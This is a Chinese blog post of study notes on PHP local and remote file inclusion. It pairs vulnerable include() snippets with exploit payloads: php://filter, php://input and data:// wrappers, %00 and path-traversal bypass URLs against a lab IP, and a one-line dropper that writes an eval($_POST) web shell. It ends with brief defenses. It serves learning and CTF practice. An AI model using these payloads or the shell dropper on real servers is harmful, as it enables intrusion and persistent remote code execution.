文件包含漏洞学习笔记

最新推荐文章于 2024-04-24 09:02:22 发布
最新推荐文章于 2024-04-24 09:02:22 发布
阅读量406 收藏
点赞数
分类专栏: WEB安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43790779/article/details/105441425
版权

文章目录

什么是文件包含漏洞

  1. 什么是文件包含?
    为了更好地使用代码的 重用性 ,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。
  2. 文件包含分为本地文件包含和远程文件包含。
  3. 文件包含漏洞的成因是什么?
    在包含文件时,为了灵活包含文件,将被包含文件设置为变量,通过动态变量来引入需要包含的文件时,用户可以对变量的值进行改变,而服务器端未对变量的值进行合理性校验或者检验被绕过,这样就导致了文件包含漏洞。通常文件包含漏洞出现在PHP语言中。
<?php
	$file = $_GET['file'];
	include($file);
?>

文件包含函数

文件包含:
include;
include_once;
require;
require_once;
文件读取:
highlight_file,show_source,readfile,file_get_contents,fopen,file

include ,有返回值,如果改函数包含的文件路径有误,不影响下面代码的执行
require,无返回值, 如果改函数包含的文件路径有误,会中断下面代码的执行

文件包含漏洞的利用方式—伪协议

协议用法
file://?file=file://D:soft/phpStudy/www/phpcode.txt
php://filter?file=php://filter/read=convert.base64-encode/resource=./index.php
php://input?file=php://input [POST DATA] <?php phpinfo();?>
zip://?file=zip:///D:soft/phpStudy/www/file.zip%23phpcode.txt
compress.bzip2://?file=compress.bzip2:///D:soft/phpStudy/www/file.bz2 [or] ?file=compress.bzip2://./file.bz2
compress.zlib://?file=compress.zlib://D:soft/phpStudy/www/file.gz [or] ?file=compress.zlib://./file.gz
data://?file=data://text/plain,<?php phpinfo();?> [or] ?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= [or] file=data:text/plain,<?php phpinfo();?> [or] ?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

说明:

  • php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤。
  • php://input 可以访问请求的原始数据的只读流,将post请求的数据当做php代码执行。
  • data:// 同样类似php://input ,可以让用户来控制输入流。

文件包含漏洞的利用方式—其他

  1. %00截断绕过
    示例:后台php代码
include("includes/".$_GET['page'].".php");

可以构造url

http://192.168.0.5/?page=../flag.php%00
  1. 点加斜杠绕过
    示例:后台php代码
if(substr($_GET['page'],-4,4) != '.php')   //取后缀名
	echo file_get_contents($_GET['page']);
else
	echo 'You are not allow to see source files!';

可以构造url

http://192.168.0.5/?page=../flag.php.
或
http://192.168.0.5/?page=../flag.php./
  1. 去掉后缀名绕过
    示例:后台php代码
$path = 'includes/class_'.addslashes($_GET['class']).'.php';
echo file_get_contents($path);

可以构造url

http://192.168.0.5/?class=../flag
  1. 双写绕过
    示例:后台php代码
$file = str_replace('../','',$_GET['file']);
if(isset($file))
	include("pages/$file");
else
	include("index.php");

可以构造url

http://192.168.0.5/?file=..././flag.php
  1. 文件包含写shell
    示例:后台php代码
include($_POST["page"]);

可以利用hackbar添加POST参数

page=../image.jpg

在image.jpg中写入
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST['a'])?>');?>
  1. 长度截断(Windows:256, Linux:4096)
  2. 包含日志文件
  3. 包含session

文件包含漏洞的防御

  • PHP中使用open_basedir 配置限制访问在指定的区域
  • 过滤 . / \
  • 禁止服务器远程文件包含
  • 尽量不要使用动态文件包含,可在需要包含的页面固定写好
abtgu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-nizhuansiwei/php伪协议文件包含函数,反序列化
weixin_38885346的博客
04-09 387
打开靶场后,可以看到代码如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1&
CTFSHOW-文件包含
Monica的博客
09-12 5668
WEB78 题目: <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 知识点:php伪协议 php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 1、php://input
文件包含漏洞全面详解
最新发布
heike_Ch的博客
04-24 905
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
CG CTF-Web-file_get_contents
feng的博客
09-08 822
WP 进入环境后先发现什么都没有,我们f12查看源码,会发现代码,因此进行代码审计: <!--$file = $_GET['file']; if(@file_get_contents($file) == "meizijiu"){ echo $nctf; }--> 我们可以发现这题有一个file_get_contents函数。因为我们要get一个file,而且他的内容还要是meizijiu,我一开始想到了文件包含相关的内容,想到了php的一些伪协议。这时候我上网查file_get_con
php $_get 利用,PHP $_GET 讲解
weixin_42292183的博客
04-08 309
$_GET 变量用于收集来自 method="get" 的表单中的值,直观的的就是浏览器中可以看到的参数,比如我在百度搜索“wordpress”的时候,我请求的url就是http://www.baidu.com/s?ie=utf-8&bs=wordpress&f=8&rsv_bp=1&wd=wordpress&inputT=0,那么'?'后面的参数都是可以用...
DVWA靶场-文件包含
Mr_helloword的博客
07-31 380
文件包含 低级 源码: <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 低级什么也没做,直接包含文件: 中级 查看源代码: <?php // The page we wish to display $file = $_GET[ 'page' ]; // Input validation $file = str_replace( array( "http://", "https://" ), ""
Webgoat学习笔记.zip
03-12
3. 文件包含漏洞:研究如何通过文件包含漏洞执行任意代码,学习限制文件包含功能,使用安全的相对路径或白名单机制来防范。 4. 认证与会话管理:掌握弱密码策略、会话固定、会话劫持等问题,学习使用强认证机制和...
渗透学习笔记
12-30
这份名为"渗透学习笔记"的压缩包包含了多个文本文件,涵盖了渗透测试中的一些关键领域,如MySQL注入、CMS探测、数据库探测等。以下是这些知识点的详细说明: 1. **MySQL手注大全.txt**: MySQL注入是常见的Web应用...
蓝牙学习笔记
08-05
其中,链路层负责设备之间的连接和数据传输,网络层处理广播和多播,会话层管理不同服务的访问,应用层则包含各种具体的应用规范,如A2DP(高级音频分布配置文件)用于音频流,GATT(通用属性配置文件)用于BLE的...
安全测试学习笔记.pdf
05-28
应对用户上传的文件内容进行审查,防止包含恶意代码。 6. **Session管理**: Session是跟踪用户状态的重要手段,但存在被劫持或篡改的风险。Session数据可以存储在cookie、URL参数或服务器端。存储在cookie中时应...
渗透测试,文件上传漏洞笔记知识梳理图,适用于学习渗透测试初学者学习,仅供参考学习
06-02
4. **图片马**:将Webshell代码嵌入到图片中,配合文件包含漏洞进行利用。 5. **条件竞争**:在高并发环境下,利用后台处理流程中的时间差,使得恶意文件在被删除之前得以保存。 **漏洞发现**常见于用户上传头像、...
file_get_contents("php://input")的使用方法
快乐de馒头
02-21 2787
$data = file_get_contents("php://input"); php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活 alwa
CTFshow 文件包含 78-88&116-117
Landasika的博客
05-17 1050
目录 web78web79web80方法一、http://远程包含方法二、include包含日志web81web82-86:条件竞争web87*web88web116web117 web78 if(isset($_GET['file'])){ $file=$_GET['file']; include($file); }else{ highlight_file...
本地文件包含漏洞详解
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件包含分为两种,一种为本地文件包含,一种为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。 0x01:涉及函数 文件包含php 中,涉及到的危险函数有四个,分别是 inclu...
Web安全-文件包含
sixoneyvye的博客
04-17 451
一、了解文件包含 了解文件包含 什么是文件包含:为了更好地使用代码的重用性,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码,简单点来说就是一个文件里面包含另外一个或多个文件。 漏洞成因:文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。 PHP引发文件包含的四个函数 include() ...
file_get_content的get和post请求
技术的搬运工
03-21 5430
上下文选项 介绍: PHP提供了多种上下文选项和参数,可用于所有的文件系统或数据流封装协议。上下文由 stream_context_create()创建。选项可通过stream_context_set_option()设置,参数可用stream_context_set_params()设置。 多种上下文:(请参考php手册) 获取上下文: //http上下文 $pos...
php获取本地图片直接输出浏览器,file_get_contents
热门推荐
辉少的博客
11-30 2万+
php获取本地图片直接输出浏览器,file_get_contents $url = 'www.12345t.com/?code; //file_get_contents($url,true); 可以读取远程图片,也可以读取本地图片 $img = file_get_contents($url,true); //使用图片头输出浏览器 header("Content-Type:
get_file获取文件
weixin_42206101的博客
11-26 3119
get_file获取文件 from keras.utils import get_file fname='ResNet-50-model.keras.h5' origin='https://github.com/fizyr/keras-models/releases/download/v0.0.1/ResNet-50-model.keras.h5' checksum=''3e9f4e4f77bbe2c9bec13b53ee1c2319' a=get_file(fname, origi
032-内网横向移动学习备忘录1
08-04
- ** Cobalt Strike**:一套高级的渗透测试工具,包含Beacon代理,可用于持久化控制、内网探测和横向移动。 为了防御此类攻击,企业应加强网络安全措施,包括: - **及时更新和打补丁**:确保所有系统都运行最新的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值